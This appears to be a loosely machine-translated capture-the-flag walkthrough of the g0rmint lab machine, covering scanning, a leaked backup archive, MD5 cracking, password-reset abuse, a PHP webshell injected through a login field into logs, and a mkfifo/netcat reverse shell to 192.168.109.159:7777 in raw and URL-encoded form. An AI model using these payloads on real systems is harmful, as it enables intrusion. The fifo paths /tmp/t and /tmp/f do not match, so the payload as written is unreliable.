1. Host found
2. Port scanning
3. Access port 80 to see
Sure enough, 404 pages, take a look at robots.txt
4. Scan directory
Look with a scanning dirbuster
Did not find useful information in order to quickly access the complete catalog, start with the login screen look carefully
View at source
Try direct access, no results
What next scan the directory file
Only to find a visit to see
There is a backdoor compressed file, try to download to see
After extracting the following:
5. code audit
db.sql the most prominent, the first open look
Find useful information id, user name, email, password (temporarily not sure what encryption) to see if there is no mention login.php
MD5 encryption, decryption password just
The password is demo, log in to see
Unfortunately, the login fails, then look at the configuration file config.php
When prompted, take a look at dummy.php file
Login before failure can also be password has been reset, look reset.php
Found previously using a user name and mailbox reset try
Users do not even exist, can only email a global search to see if there was found
Style.css found in the user name: noman, E-mail: [email protected], to reset the page
Successfully reset, see the bottom right time, hash value before encryption think, look at the online calculation
Password (the green part): 161c7c128ce879b5371d df4684f0338188e256c6, log in to see
Successful login, password reset
Direct access to log files ( http://192.168.109.170/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-01-04.php ), failed login records
6.getshell
Mailbox when you log in, insert the word horse php
Login failed access logs submitted by post parameters
Rebound shell
cmd=`mkfifo /tmp/t`;
cmd=`cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.109.159 7777 >/tmp/f`;
After the URL encoding
cmd=%60mkfifo%20%2ftmp%2ft%60%3B
cmd=%60cat%20%2ftmp%2ff%7C%2fbin%2fsh%20-i%202%3E%261%7Cnc%20192.168.109.159%207777%20%3E%2ftmp%2ff%60%3B
Open listening: nc -lvnp 7777
The connection is successful acquisition shell, whoami command to view permissions, cat / etc / issue obtain the version, you can also see the version from the drone
7. mention the right
搜索版本漏洞:searchsploit ubuntu 16
后续步骤与下面链接中靶机提权步骤一致